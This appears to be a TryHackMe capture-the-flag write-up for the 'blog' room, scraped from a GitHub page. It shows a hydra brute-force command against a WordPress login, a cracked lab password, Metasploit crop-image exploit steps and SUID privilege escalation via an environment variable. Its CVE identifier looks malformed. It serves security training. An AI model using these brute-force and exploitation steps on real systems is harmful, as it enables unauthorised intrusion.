Writeup for THM Room blog

set -gx IP 10.10.231.216
# Entry in /etc/hosts:
set -gx IP blog.thm

Found http service (wordpress blog)

Found usernames: kwheel & bjoel

Brute force

 hydra -l kwheel -P /usr/share/wordlists/rockyou blog.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.thm%2Fwp-admin%2F&testcookie=1:F=The password you entered for the username" -V

Found credentials: kwheel:cutiepie1

Use CVE-2019-89242 | CVE-2019-89242

msfconsole
# search for crop-image exploit
search crop-image
# use first of list
use 0
# set RHOSTS, USERNAME, PASSWORD
# run exploit
exploit

After this you'll get meterpreter session as www-html

Exploit machine

cd to /user/bjoel and found user.txt with fake content

Search for SUID Flag

find / -perm /4000 2>/dev/null

Found /usr/sbin/checker

Inspect checker method

ltrace checker

checker relies on env variable admin. So set it with

export admin=1

Run checker and be root:

checker
whoami
# > root

Get flags

cat /root/root.txt
find / -name user.txt 2>/dev/null
cat /usr/media/user.txt

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
nmap		nmap
Alice-White-Rabbit.jpg		Alice-White-Rabbit.jpg
check-this.png		check-this.png
readme.md		readme.md
tswift.mp4		tswift.mp4

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

nmap

nmap

Alice-White-Rabbit.jpg

Alice-White-Rabbit.jpg

check-this.png

check-this.png

readme.md

readme.md

tswift.mp4

tswift.mp4

Repository files navigation

Writeup for THM Room blog

Found http service (wordpress blog)

Brute force

Use CVE-2019-89242 | CVE-2019-89242

Exploit machine

Get flags

About

Releases

Packages

Crako123/THM-blog

Folders and files

Latest commit

History

Repository files navigation

Writeup for THM Room blog

Found http service (wordpress blog)

Brute force

Use CVE-2019-89242 | CVE-2019-89242

Exploit machine

Get flags

About

Resources

Stars

Watchers

Forks